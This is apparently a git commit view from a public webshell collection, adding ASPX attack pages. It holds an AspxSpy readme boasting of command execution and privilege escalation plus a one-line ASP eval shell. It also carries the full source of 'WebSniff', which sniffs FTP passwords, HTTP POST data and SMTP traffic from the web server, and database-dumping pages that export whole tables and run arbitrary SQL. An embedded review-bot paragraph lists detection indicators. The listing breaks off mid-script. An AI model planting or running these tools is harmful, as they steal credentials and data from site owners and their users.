mirror of https://github.com/tennc/webshell.git synced 2026-02-07 14:06:35 +00:00

update net-friend

tennc
2013-06-20 09:50:18 +08:00
parent bb025735ea
commit 0b16c9f65f
95 changed files with 84948 additions and 0 deletions

2941
net-friend/aspx/01.aspx Normal file

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

1047
net-friend/aspx/1.aspx Normal file

File diff suppressed because it is too large Load Diff

1561
net-friend/aspx/11.aspx Normal file

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

2588
net-friend/aspx/aspx.aspx Normal file

File diff suppressed because it is too large Load Diff

1563
net-friend/aspx/aspxspy.aspx Normal file

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff


@@ -0,0 +1,33 @@
AspxSpy 1.0 Cody By Bin[20nt]
Readme:
1.开发环境VS2005 + C#兼容FrameWork1.1/2.0,基本实现代码分离。
2.密码为32位MD5加密(小写) 默认为 admin.
3.采用POST方式提交数据增强了隐蔽性。
4.添加了IIS探测功能遍历IIS站点信息。
5.增强了对文件属性的修改。
6.在SQLTools中增加了SA权限执行系统命令功能SQL_DIR 功能可以直接备份log/database到指定目录。
文件名为bin.asp Shell 为<%execute request("B")%>
7.增加了 Serv-u 提权功能.
8.可以对端口实现单线程扫描。
9.可以对注册表进行简单的读取.
PS: 先发布一个测试版本,有几个功能没有加上,有兴趣的朋友可以测试下估计很快就会被K发现BUG可以到www.rootkit.net.cn反馈.
E-mail : master@rootkit.net.net
感谢 Snailsor 的技术支持还有Fuyu对我的关怀祝大家新年快乐

33
net-friend/aspx/read.txt Normal file

@@ -0,0 +1,33 @@
AspxSpy 1.0 Cody By Bin[20nt]
Readme:
1.开发环境VS2005 + C#兼容FrameWork1.1/2.0,基本实现代码分离。
2.密码为32位MD5加密(小写) 默认为 admin.
3.采用POST方式提交数据增强了隐蔽性。
4.添加了IIS探测功能遍历IIS站点信息。
5.增强了对文件属性的修改。
6.在SQLTools中增加了SA权限执行系统命令功能SQL_DIR 功能可以直接备份log/database到指定目录。
文件名为bin.asp Shell 为<%execute request("B")%>
7.增加了 Serv-u 提权功能.
8.可以对端口实现单线程扫描。
9.可以对注册表进行简单的读取.
PS: 先发布一个测试版本,有几个功能没有加上,有兴趣的朋友可以测试下估计很快就会被K发现BUG可以到www.rootkit.net.cn反馈.
E-mail : master@rootkit.net.net
感谢 Snailsor 的技术支持还有Fuyu对我的关怀祝大家新年快乐


@@ -0,0 +1,707 @@
<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="System.Net.Sockets" %>
<%@ Import Namespace="System.Net" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Collections" %>
<%@ Import Namespace="System.Text" %>
<%@ Import Namespace="System.Net.NetworkInformation" %>
<%@ Import Namespace="System.Threading" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>WebSniff 1.0 Powered by 上善若水 汉化版 </title>
</head>
<body>
<script runat="server">
static private Socket mainSocket; //The socket which captures all incoming packets
private static byte[] byteData = new byte[2048];
private static bool bContinueCapturing = true; //A flag to check if packets are to be captured or not
static int stoppackes = 0;
static int port = 0;
static string strIP = null;
static long packets = 0;
static System.IO.FileStream wfs;
static string logfile =null;
static PacketCaptureWriter pktwt;
static string keyword;
static DateTime stoptime = System.DateTime.Now.AddYears(-8);
static Thread th;
static int minisizepacket=0;
static string proException = null;
static Boolean logNextPacket = false;
static Boolean my_s_ftp= true;
static Boolean my_s_http_post = false;
static Boolean my_s_smtp = false;
protected void Page_Load(object sender, EventArgs e)
{
if (logfile == null)
{
logfile = Server.MapPath("w" + System.DateTime.Now.ToFileTime() + ".txt");
}
if (stoptime.Year == (System.DateTime.Now.Year - 8))
{
System.DateTime nextDay = System.DateTime.Now.AddDays(1);
stoptime = nextDay;
}
//没有生成IP列表
if (ddlist.Items.Count==0)
{
IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));
if (HosyEntry.AddressList.Length > 0)
{
foreach (IPAddress ip in HosyEntry.AddressList)
{
ddlist.Items.Add(ip.ToString());
}
}
}
//如不是点击Starts按钮则打印已经设过的参数
if (Request.Form["Starts"] == null)
{
this.ddlist.SelectedValue = strIP;
this.txtport.Text = port.ToString();
this.txtMinisize.Text = minisizepacket.ToString();
this.txtkeywords.Text = keyword;
this.txtlogfile.Text = logfile;
this.txtpackets.Text = stoptime.ToString();
this.s_ftp.Checked = my_s_ftp;
this.s_http_post.Checked = my_s_http_post;
this.s_smtp.Checked = my_s_smtp;
}
if (th != null )
{
this.Lb_msg.Text = System.DateTime.Now.ToString()+" State: <b>" + th.ThreadState.ToString() +"</b> Packets: "+packets.ToString();
}
else
{
this.Lb_msg.Text = "嗅探还没有开始额";
}
if (Request.Form["Starts"] != null || th != null)
{
this.Starts.Enabled = false;
}
else
{
this.Starts.Enabled = true;
}
//点击了stop按钮
if (Request.Form["Button1"] != null)
{
this.Starts.Enabled = true;
this.Lb_msg.Text = System.DateTime.Now.ToString() + " State: <b>stoping. Click \"Refresh\" again to see if thread is stoped successed.</b> Packets: " + packets.ToString();
}
Lb_msg2.Text = proException; //错误信息
}
protected void Refresh_Click(object sender, EventArgs e)
{
}
protected void Stop_Click(object sender, EventArgs e)
{
packets = stoppackes;
//stoptime = System.DateTime.Now;
proException += "<br>last time stop at " + System.DateTime.Now.ToString();
bContinueCapturing = false;
if (th != null)
{
th.Abort();
th = null;
}
try
{
wfs.Close();
mainSocket.Close();
}
catch (Exception ex)
{
}
}
protected void Pagestart()
{
//记录设置过的参数
strIP = ddlist.SelectedValue;
port = Int32.Parse(txtport.Text);
stoptime = Convert.ToDateTime( txtpackets.Text);
logfile = this.txtlogfile.Text;
keyword = txtkeywords.Text;
minisizepacket = Int32.Parse(txtMinisize.Text);
my_s_ftp = this.s_ftp.Checked;
my_s_http_post = this.s_http_post.Checked;
my_s_smtp = this.s_smtp.Checked;
wfs = System.IO.File.Create(logfile);
pktwt = new PacketCaptureWriter(wfs, LinkLayerType.RawIP);
bContinueCapturing = true;
packets = 0;
Start();
}
private static void Start()
{
byte[] byTrue = new byte[4] { 1, 0, 0, 0 };
byte[] byOut = new byte[4] { 1, 0, 0, 0 };
try
{
bContinueCapturing = true;
mainSocket = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP);
mainSocket.Bind(new IPEndPoint(IPAddress.Parse(strIP), 0));
mainSocket.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, true);
mainSocket.IOControl(IOControlCode.ReceiveAll, byTrue, byOut);
}
catch (Exception ex)
{
proException += ex.ToString()+"<BR>"; //静态方法可以访问静态变量proException
}
byteData = new byte[2048];
while (System.DateTime.Now <= stoptime)
{
ParseData(byteData, mainSocket.Receive(byteData));
}
bContinueCapturing = false;
wfs.Close();
mainSocket.Close();
}
protected void Start_Click(object sender, EventArgs e)
{
if (this.txtlogfile.Text == "" || txtpackets.Text.Length < 1 || txtport.Text == "") return;
th = new Thread(new ThreadStart(Pagestart));
th.Start();
//Session["workthread"] = th;
this.Lb_msg.Text = "\r\nSniffing.Click \"Refresh\" to see the lastest status.";
}
public static ushort Get2Bytes(byte[] ptr, int Index, int Type)
{
ushort u = 0;
if (Type == 0)
{
u = (ushort)ptr[Index++];
u *= 256;
u += (ushort)ptr[Index++];
}
else if (Type == 1)
{
u = (ushort)ptr[++Index];
u *= 256; Index--;
u += (ushort)ptr[Index++]; Index++;
}
return u;
}
private static void ParseData(byte[] byteData, int nReceived)
{
try
{
byte[] nbyte = new byte[nReceived];
Array.Copy(byteData, nbyte, nReceived);
if ((int)nbyte[9] == 6)
{
int sport = Get2Bytes(nbyte, 20,0);
int dport = Get2Bytes(nbyte, 22,0);
String datas=Encoding.Default.GetString(nbyte);
Boolean logIt=false;
if (my_s_ftp)
{
if ((sport == 21 || dport == 21) &&
(datas.IndexOf("USER ") >= 0 || datas.IndexOf("PASS ") >= 0)
)
{
logIt =true;
}
}
if (!logIt && my_s_http_post)
{
if(logNextPacket){
logIt =true;
logNextPacket=false;
}
if (!logIt && datas.IndexOf("POST ")>=0)
{
logIt =true;
logNextPacket=true;
}
}
if (!logIt && my_s_smtp && (dport == 25 || sport == 25))
{
logIt =true;
}
//判断端口
if (!logIt && (dport == port || sport == port))
{
if (nReceived > minisizepacket)
{
//判断关键字
if (keyword != "")
{
if (datas.IndexOf(keyword) >= 0)
{
logIt =true;
}
}
else
{
logIt =true;
}
}
}
if(logIt){
PacketCapture pkt = new PacketCapture(nbyte, nReceived);
pktwt.Write(pkt);
packets++;
}
}
}
catch { }
}
public struct UnixTime
{
public static readonly DateTime MinDateTime = new DateTime(1970, 1, 1, 0, 0, 0);
public static readonly DateTime MaxDateTime = new DateTime(2038, 1, 19, 3, 14, 7);
private readonly int _Value;
public UnixTime(int value)
{
if (value < 0)
throw new ArgumentOutOfRangeException("value");
_Value = value;
}
public int Value
{
get { return _Value; }
}
public DateTime ToDateTime()
{
const long START = 621355968000000000; // 1970-1-1 00:00:00
return new DateTime(START + (_Value * (long)10000000)).ToLocalTime();
}
public static UnixTime FromDateTime(DateTime dateTime)
{
if (dateTime < MinDateTime || dateTime > MaxDateTime)
throw new ArgumentOutOfRangeException("dateTime");
TimeSpan span = dateTime.Subtract(MinDateTime);
return new UnixTime((int)span.TotalSeconds);
}
public override string ToString()
{
return ToDateTime().ToString();
}
}
public enum LinkLayerType : uint
{
Null = 0,
Ethernet = 1,
RawIP = 101,
User0 = 147,
User1 = 148,
User2 = 149,
User3 = 150,
User4 = 151,
User5 = 152,
User6 = 153,
User7 = 154,
User8 = 155,
User9 = 156,
User10 = 157,
User11 = 158,
User12 = 159,
User13 = 160,
User14 = 161,
User15 = 162,
}
public sealed class PacketCaptureWriter
{
#region Fields
private const uint MAGIC = 0xA1B2C3D4;
private readonly Stream _BaseStream;
private readonly LinkLayerType _LinkLayerType;
private readonly int _MaxPacketLength;
private readonly BinaryWriter m_Writer;
private bool m_ExistHeader = false;
private int _TimeZone;
private int _CaptureTimestamp;
#endregion
#region Constructors
public PacketCaptureWriter(
Stream baseStream, LinkLayerType linkLayerType,
int maxPacketLength, int captureTimestamp)
{
if (baseStream == null) throw new ArgumentNullException("baseStream");
if (maxPacketLength < 0) throw new ArgumentOutOfRangeException("maxPacketLength");
if (!baseStream.CanWrite) throw new ArgumentException("Cant'Wirte Stream");
_BaseStream = baseStream;
_LinkLayerType = linkLayerType;
_MaxPacketLength = maxPacketLength;
_CaptureTimestamp = captureTimestamp;
m_Writer = new BinaryWriter(_BaseStream);
}
public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType, int captureTimestamp)
: this(baseStream, linkLayerType, 0xFFFF, captureTimestamp)
{
}
public PacketCaptureWriter(Stream baseStream, LinkLayerType linkLayerType)
: this(baseStream, linkLayerType, 0xFFFF, UnixTime.FromDateTime(DateTime.Now).Value)
{
}
#endregion
#region Properties
public short VersionMajor
{
get { return 2; }
}
public short VersionMinjor
{
get { return 4; }
}
public int TimeZone
{
get { return _TimeZone; }
set { _TimeZone = value; }
}
public int CaptureTimestamp
{
get { return _CaptureTimestamp; }
set { _CaptureTimestamp = value; }
}
public Stream BaseStream
{
get { return _BaseStream; }
}
public LinkLayerType LinkLaterType
{
get { return _LinkLayerType; }
}
public int MaxPacketLength
{
get { return _MaxPacketLength; }
}
#endregion
public void Write(PacketCapture packet)
{
CheckHeader();
m_Writer.Write(packet.Timestamp.Value);
m_Writer.Write(packet.Millseconds);
m_Writer.Write(packet.Packet.Count);
m_Writer.Write(packet.RawLength);
m_Writer.Write(packet.Packet.Array, packet.Packet.Offset, packet.Packet.Count);
}
public void Flush()
{
BaseStream.Flush();
}
private void CheckHeader()
{
if (!m_ExistHeader)
{
m_Writer.Write(MAGIC);
m_Writer.Write(VersionMajor);
m_Writer.Write(VersionMinjor);
m_Writer.Write(TimeZone);
m_Writer.Write(CaptureTimestamp);
m_Writer.Write(MaxPacketLength);
m_Writer.Write((uint)LinkLaterType);
m_ExistHeader = true;
}
}
}
public sealed class PacketCapture
{
private readonly UnixTime _Timestamp;
private readonly ArraySegment<byte> _Packet;
private readonly int _RawLength;
private readonly int _Millseconds;
public PacketCapture(ArraySegment<byte> packet, int rawLength, UnixTime timestamp, int millseconds)
{
if (packet.Count > rawLength)
throw new ArgumentException("Length Error", "rawLength");
_Packet = packet;
_Timestamp = timestamp;
_RawLength = rawLength;
_Millseconds = millseconds;
}
public PacketCapture(ArraySegment<byte> packet, int rawLength, DateTime timestamp)
: this(packet, rawLength, UnixTime.FromDateTime(timestamp), 0)
{
}
public PacketCapture(ArraySegment<byte> packet, int rawLength)
: this(packet, rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
{
}
public PacketCapture(ArraySegment<byte> packet)
: this(packet, packet.Count)
{
}
public PacketCapture(byte[] packetData, int offset, int count, int rawLength, UnixTime timestamp, int millseconds)
: this(new ArraySegment<byte>(packetData, offset, count), rawLength, timestamp, millseconds)
{
}
public PacketCapture(byte[] packetData, int offset, int count, int rawLength, DateTime timestamp)
: this(new ArraySegment<byte>(packetData, offset, count), rawLength, UnixTime.FromDateTime(timestamp), 0)
{
}
public PacketCapture(byte[] packetData, int rawLength, UnixTime timestamp, int millseconds)
: this(new ArraySegment<byte>(packetData), rawLength, timestamp, millseconds)
{
}
public PacketCapture(byte[] packetData, int rawLength, DateTime timestamp)
: this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(timestamp), 0)
{
}
public PacketCapture(byte[] packetData, int rawLength)
: this(new ArraySegment<byte>(packetData), rawLength, UnixTime.FromDateTime(DateTime.Today), 0)
{
}
public PacketCapture(byte[] packetData)
: this(packetData, packetData.Length)
{
}
public ArraySegment<byte> Packet
{
get { return _Packet; }
}
public UnixTime Timestamp
{
get { return _Timestamp; }
}
public int Millseconds
{
get { return _Millseconds; }
}
public int RawLength
{
get { return _RawLength; }
}
}
</script>
<style type="text/css">
<!--
a {
color: #FF0000 ;text-decoration: none
}
#b
{
color: #336699;
font-size: 10pt;
text-align: right;
}
#tt
{
vertical-align: middle;
font-size: 12pt;
text-align: center;
}
#Ct_2
{
padding-left:30px;
font-size: 10pt;
color: #336699;
vertical-align: middle;
text-align: left;
background-color: aliceblue;
border-width: 1px;
border-style: solid;
border-color: -moz-use-text-color;
padding-bottom:10px;
}
-->
</style>
<form id="form1" runat="server">
<div id="tt"> <b> WebSniff 1.0</b><br /><br /> </div>
<div id="Ct_2" >
<table width="100%" >
<tr >
<td width="10%"> 目标IP: </td>
<td ><asp:DropDownList ID="ddlist" runat="server" width="90%"></asp:DropDownList></td>
</tr>
<tr >
<td width="10%">自动嗅探: </td>
<td >
FTP 密码:
<asp:CheckBox ID="s_ftp" runat="server" Checked />
&nbsp;&nbsp;
HTTP Post Data:
<asp:CheckBox ID="s_http_post" runat="server" />
&nbsp;&nbsp;
Smtp Data:
<asp:CheckBox ID="s_smtp" runat="server" />
</td>
</tr>
<tr>
<td ">
目标端口:
</td>
<td>
<asp:TextBox ID="txtport" Text="0" width="90%" runat="server"></asp:TextBox>
</td>
</tr>
<tr>
<td >
数据包大小:
</td>
<td >
<asp:TextBox ID="txtMinisize" Text="0" width="90%" runat="server" ></asp:TextBox>
</td>
</tr>
<tr>
<td>
关键字如passwd):
</td>
<td>
<asp:TextBox ID="txtkeywords" runat="server" width="90%" Text=""></asp:TextBox>
</td>
</tr>
<tr>
<td >
数据包文件存放位置:
</td>
<td>
<asp:TextBox ID="txtlogfile" runat="server" width="90%" Text="log.log" ></asp:TextBox>
</td>
</tr>
<tr>
<td >
定时停止:
</td>
<td>
<asp:TextBox ID="txtpackets" runat="server" width="90%" Text="300"></asp:TextBox>
</td>
</tr>
<tr>
<td >
控制:
</td>
<td width="90%" > <asp:Button ID="Starts" runat="server" OnClick="Start_Click" Text="开始" />
<asp:Button ID="Button1" runat="server" OnClick="Stop_Click" Text="停止" />
<asp:Button ID="Button_ref" runat="server" OnClick="Refresh_Click" Text="保存" /><br />
</td>
</tr>
<tr>
<td >
Status:
</td>
<td width="90%"><div id="s"><asp:Label ID="Lb_msg" runat="server" Text=""></div></asp:Label>
</td>
</tr>
<tr>
<td >
</td>
<td width="90%"><div id="s"><asp:Label ID="Lb_msg2" runat="server" Text=""></div></asp:Label>
</td>
</tr>
</table>
</div><br /><br />
<div id=b>Powered by <a href="//user.qzone.qq.com/356497021"> 上善若水 </a>|汉化
<a href=" http://user.qzone.qq.com/356497021">1</a>
<a href="http://user.qzone.qq.com/356497021">2</a>
</div>
</form>
</body>
</html>
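Review bot: Nothing at the top of this page documents that it is a credential-capturing sniffer, so the section should open with a comment such as `<%-- Sample: ASP.NET page that opens a raw IP socket in receive-all mode and writes matching TCP packets to a capture file next to the page --%>`. The behaviour worth alerting on is in `Start()`: `SocketType.Raw` combined with `IOControlCode.ReceiveAll` issued from a web worker process, a call that on Windows needs an administrative identity, so an application pool running under a low-privileged account should make it fail. `ParseData` keeps port 21 packets containing `USER ` or `PASS `, any packet containing `POST ` plus the one after it, and port 25 traffic, and `Page_Load` defaults the output path to `Server.MapPath("w" + ... + ".txt")`, so unexpected files in a site directory that begin with the `0xA1B2C3D4` capture magic are a useful hunt indicator. `ValidateRequest="false"` in the page directive and the capture `Thread` kept in a static field are further review flags for any .aspx file.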

1686
net-friend/aspx/view.aspx Normal file

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff


@@ -0,0 +1,573 @@
<%@ Page Language=”C#” %>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd“>
<script runat=”server”>
protected void Button1_Click(object sender, EventArgs e)
{
string serverIP=txtServerIP.Text;
string database=txtDatabase.Text;
string user=txtUser.Text;
string pass=txtPass.Text;
string tableName=txtTableName.Text;
string colName=txtColName.Text;
string fileName=txtFileName.Text;
if (serverIP != null & database != null & user != null & pass != null & tableName != null & fileName != null)
{
string connectionString = “server=”+serverIP+”;database=”+database+”;uid=”+user+”;pwd=”+pass;
System.Data.SqlClient.SqlConnection connection = new System.Data.SqlClient.SqlConnection(connectionString);
try
{
connection.Open();
string sqlStr = “select * from “+tableName;
if (colName!=”")
{
sqlStr = “select ” + colName + ” from ” + tableName;
}
System.Data.DataSet ds = new System.Data.DataSet();
System.Data.SqlClient.SqlCommand cmd = new System.Data.SqlClient.SqlCommand(sqlStr, connection);
System.Data.SqlClient.SqlDataAdapter da = new System.Data.SqlClient.SqlDataAdapter(cmd);
da.Fill(ds);
System.Data.DataTable dataTable = ds.Tables[0];
if (dataTable.Rows.Count==0)
{
lblInfo.Text = “没有需要导出的数据!”;
lblInfo.ForeColor = System.Drawing.Color.Blue;
return;
}
string filePath = System.IO.Path.GetDirectoryName(Server.MapPath(“DataOutExl.aspx”))+”\\DataOut“;
if (!System.IO.Directory.Exists(filePath))
{
System.IO.Directory.CreateDirectory(filePath);
}
bool outType = RadioButton1.Checked;
int sum = dataTable.Rows.Count;
int count = 1;
int size = 0;
int tmpNum = 1;
if (txtNum.Text!=”")
{
size = int.Parse(txtNum.Text);
count = sum / size+1;
}
for (int z = 0; z < count; z++)
{
Button1.Text = “正在导出..”;
Button1.Enabled = false;
lblInfo.Text = “正在导出第”+(z+1)+”组数据,共”+count+”组数据”;
lblInfo.ForeColor = System.Drawing.Color.Blue;
System.IO.StreamWriter file = new System.IO.StreamWriter(filePath+”\\” + (z+1) +”_”+fileName, false, Encoding.UTF8);
bool isFirst = true;
if (outType)
{
file.Write(@”<html><head><meta http-equiv=content-type content=text/html; charset=UNICODE>
<style>*{font-size:12px;}table{background:#DDD;border:solid 2px #CCC;}td{background:#FFF;}
.th td{background:#EEE;font-weight:bold;height:28px;color:#008;}
div{border:solid 1px #DDD;background:#FFF;padding:3px;color:#00B;}</style>
<title>Export Table</title></head><body>”);
file.Write(“<table border=0 cellspacing=1 cellpadding=3>”);
}
for (int i = size*z; i < dataTable.Rows.Count; i++)
{
System.Data.DataRow dataRow = dataTable.Rows[i];
if (isFirst)
{
if ( outType)
{
file.Write(“<tr class=th>”);
}
for (int j = 0; j < dataTable.Columns.Count; j++)
{
if (outType)
{
file.Write(“<td>”);
}
file.Write(dataTable.Columns[j].ColumnName + “ “);
if (outType)
{
file.Write(“</td>”);
}
}
if (outType)
{
file.Write(“</tr>”);
}
isFirst = false;
}
if (outType)
{
file.Write(“<tr>”);
}
else
{
file.WriteLine(” “);
}
for (int k = 0; k < dataTable.Columns.Count; k++)
{
if (outType)
{
file.Write(“<td>”);
}
file.Write(dataTable.Rows[i][k] + “ “);
if (outType)
{
file.Write(“</td>”);
}
}
if (outType)
{
file.Write(“<tr>”);
}
else
{
file.WriteLine(” “);
}
if (tmpNum==size)
break;
tmpNum += 1;
}
if (outType)
{
file.Write(“</table>”);
file.Write(“<br /><div>执行成功!返回” + tmpNum + “行</div>”);
file.Write(“</body></html>”);
}
else
{
file.WriteLine(“执行成功!返回” + tmpNum + “行!”);
}
file.Dispose();
file.Close();
tmpNum = 1;
}
lblInfo.Text = “导出成功!”;
lblInfo.ForeColor = System.Drawing.Color.Blue;
Button1.Enabled = true;
Button1.Text = “开始导出”;
}
catch (Exception ex)
{
lblInfo.Text = “导出失败!” + ex.Message;
lblInfo.ForeColor = System.Drawing.Color.Red;
}finally
{
connection.Close();
}
}
else
{
lblInfo.Text = “请先填写相关的连接信息!”;
lblInfo.ForeColor = System.Drawing.Color.Red;
}
}
</script>
<html xmlns=”http://www.w3.org/1999/xhtml“>
<head runat=”server”>
<title>无标题页</title>
<style type=”text/css”>
.style1
{
width: 61%;
}
.style2
{
height: 23px;
}
</style>
</head>
<body>
<form id=”form1″ runat=”server”>
<div>
<table>
<tr>
<td colspan=”2″ align=center>
SQL Server 数据导出&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
友情链接:<a href=”http://hi.baidu.com/5427518“>情Blog</a></td>
</tr>
<tr>
<td>
服务器IP:</td>
<td>
<asp:TextBox ID=”txtServerIP” runat=”server” Width=”172px”></asp:TextBox>
*</td>
</tr>
<tr>
<td>
数据库:</td>
<td>
<asp:TextBox ID=”txtDatabase” runat=”server” Width=”172px”></asp:TextBox>
*</td>
</tr>
<tr>
<td>
用户名:</td>
<td>
<asp:TextBox ID=”txtUser” runat=”server” Width=”172px”></asp:TextBox>
*</td>
</tr>
<tr>
<td>
密码:</td>
<td>
<asp:TextBox ID=”txtPass” runat=”server” Width=”172px”></asp:TextBox>
*</td>
</tr>
<tr>
<td>
表名:</td>
<td>
<asp:TextBox ID=”txtTableName” runat=”server” Width=”172px”></asp:TextBox>
*</td>
</tr>
<tr>
<td>
列名:</td>
<td>
<asp:TextBox ID=”txtColName” runat=”server” Width=”172px”></asp:TextBox>
&nbsp; 列名之间请用‘,’分开,不写代表全部</td>
</tr>
<tr>
<td>
分组行数:</td>
<td>
<asp:TextBox ID=”txtNum” runat=”server” Width=”172px”></asp:TextBox>
&nbsp; 对于数据多的时候可以使用</td>
</tr>
<tr>
<td>
保存文件名:</td>
<td>
<asp:TextBox ID=”txtFileName” runat=”server” Width=”172px”></asp:TextBox>
*</td>
</tr>
<tr>
<td>
文件格式:</td>
<td>
<asp:RadioButton ID=”RadioButton1″ runat=”server” GroupName=”type” Checked=”true” Text=”html” />
&nbsp; &nbsp; &nbsp; &nbsp;
<asp:RadioButton ID=”RadioButton2″ runat=”server” GroupName=”type” Text=”txt” />
</td>
</tr>
<tr>
<td colspan=”2″ align=”center”>
<asp:Button ID=”Button1″ runat=”server” Text=”开始导出” onclick=”Button1_Click” />
</td>
</tr>
<tr>
<td colspan=”2″>
<asp:Label ID=”lblInfo” runat=”server” Text=”"></asp:Label>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
=======================================================
涮库webshell之二
<%@ Page Language=”C#” %>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd“>
<script runat=”server”>
protected void Page_Load(object sender, EventArgs e)
{
//if (Request["sub"] != null && Request["sub"] == “submit”)
//{
// GridView1.Visible = true;
// //System.Web.HttpContext.Current.Response.Write(DropDownList1.SelectedIndex);
// if (DropDownList1.SelectedIndex == 0)
// {
// using (System.Data.Odbc.OdbcConnection conn = new System.Data.Odbc.OdbcConnection(Request["conn"]))
// {
// conn.Open();
// System.Data.Odbc.OdbcCommand comm = new System.Data.Odbc.OdbcCommand(Request["sql"], conn);
// System.Data.Odbc.OdbcDataAdapter ad = new System.Data.Odbc.OdbcDataAdapter();
// ad.SelectCommand = comm;
// System.Data.DataSet ds = new System.Data.DataSet();
// ad.Fill(ds);
// GridView1.DataSource = ds;
// GridView1.DataBind();
// }
// }
// if (DropDownList1.SelectedIndex == 2)
// {
// using (System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(Request["conn"]))
// {
// conn.Open();
// System.Data.SqlClient.SqlCommand comm = new System.Data.SqlClient.SqlCommand(Request["sql"], conn);
// System.Data.SqlClient.SqlDataAdapter ad = new System.Data.SqlClient.SqlDataAdapter();
// ad.SelectCommand = comm;
// System.Data.DataSet ds = new System.Data.DataSet();
// ad.Fill(ds);
// GridView1.DataSource = ds;
// GridView1.DataBind();
// }
// }
// if (DropDownList1.SelectedIndex == 1)
// {
// using (System.Data.OleDb.OleDbConnection conn = new System.Data.OleDb.OleDbConnection(Request["conn"]))
// {
// conn.Open();
// System.Data.OleDb.OleDbCommand comm = new System.Data.OleDb.OleDbCommand(Request["sql"], conn);
// System.Data.OleDb.OleDbDataAdapter ad = new System.Data.OleDb.OleDbDataAdapter();
// ad.SelectCommand = comm;
// System.Data.DataSet ds = new System.Data.DataSet();
// ad.Fill(ds);
// GridView1.DataSource = ds;
// GridView1.DataBind();
// }
// }
//}
}
protected void DropDownList1_SelectedIndexChanged(object sender, EventArgs e)
{
connT.Text = DropDownList1.SelectedValue.ToString();
GridView1.Visible = false;
DropDownList2.Items.Clear();
}
protected void Button1_Click(object sender, EventArgs e)
{
if (DropDownList1.SelectedIndex == 0)
{
using (System.Data.Odbc.OdbcConnection conn = new System.Data.Odbc.OdbcConnection(connT.Text.ToString()))
//using (System.Data.OleDb.OleDbConnection conn = new System.Data.OleDb.OleDbConnection(connT.Text.ToString()))
{
conn.Open();
System.Data.DataTable dt = conn.GetSchema(“Tables”);
//GridView1.DataSource = dt;
//GridView1.DataBind();
//GridView1.Visible = true;
//DropDownList2.DataSource = dt.Select(“TABLE_TYPE=TABLE”);
//DropDownList2.DataValueField = “TABLE_NAME”;
//DropDownList2.DataTextField = “TABLE_NAME”;
//DropDownList2.DataBind();
DropDownList2.Items.Clear();
foreach (System.Data.DataRow item in dt.Select(“TABLE_TYPE=TABLE”))
{
DropDownList2.Items.Add(new ListItem(item["TABLE_NAME"].ToString(), item["TABLE_NAME"].ToString()));
}
}
}
if (DropDownList1.SelectedIndex == 1)
{
using (System.Data.OleDb.OleDbConnection conn = new System.Data.OleDb.OleDbConnection(connT.Text.ToString()))
{
conn.Open();
System.Data.DataTable dt = conn.GetSchema(“Tables”);
//GridView1.DataSource = dt;
//GridView1.DataBind();
//GridView1.Visible = true;
//DropDownList2.DataSource = dt.Select(“TABLE_TYPE=TABLE”);
//DropDownList2.DataValueField = “TABLE_NAME”;
//DropDownList2.DataTextField = “TABLE_NAME”;
//DropDownList2.DataBind();
DropDownList2.Items.Clear();
foreach (System.Data.DataRow item in dt.Select(“TABLE_TYPE=TABLE”))
{
DropDownList2.Items.Add(new ListItem(item["TABLE_NAME"].ToString(), item["TABLE_NAME"].ToString()));
}
}
}
if (DropDownList1.SelectedIndex == 2)
{
using (System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(connT.Text.ToString()))
{
conn.Open();
System.Data.SqlClient.SqlCommand comm = new System.Data.SqlClient.SqlCommand(“select name from sysobjects where type=U'”, conn);
//System.Data.SqlClient.SqlDataReader dr = comm.ExecuteReader();
//string UserTable = “”;
//while (dr.Read())
//{
// UserTable = (string)dr[0];
// DropDownList2.Items.Add(UserTable);
//}
System.Data.SqlClient.SqlDataAdapter ad = new System.Data.SqlClient.SqlDataAdapter();
ad.SelectCommand = comm;
System.Data.DataSet ds = new System.Data.DataSet();
ad.Fill(ds);
DropDownList2.DataSource = ds;
DropDownList2.DataTextField = “name”;
DropDownList2.DataValueField = “name”;
DropDownList2.DataBind();
}
}
}
protected void Button2_Click(object sender, EventArgs e)
{
string provoder = “”;
if (DropDownList1.SelectedIndex == 1)
provoder = “System.Data.OleDb”;
else if (DropDownList1.SelectedIndex == 2)
provoder = “System.Data.SqlClient”;
else if (DropDownList1.SelectedIndex ==0)
{
provoder = “System.Data.Odbc”;
}
System.Data.Common.DbProviderFactory factory = System.Data.Common.DbProviderFactories.GetFactory(provoder);
System.Data.Common.DbConnection conn=factory.CreateConnection() ;
conn.ConnectionString = connT.Text;
conn.Open();
System.Data.Common.DbCommand comm = conn.CreateCommand();
comm.CommandText = Request["sql"];
System.Data.Common.DbDataReader dr= comm.ExecuteReader();
GridView1.DataSource = dr;
GridView1.DataBind();
GridView1.Visible = true;
dr.Close();
comm.Dispose();
conn.Close();
}
</script>
<html xmlns=”http://www.w3.org/1999/xhtml“>
<head runat=”server”>
<title></title>
<script language=”javascript” type=”text/javascript”>
// <!CDATA[
function Select1_onclick() {
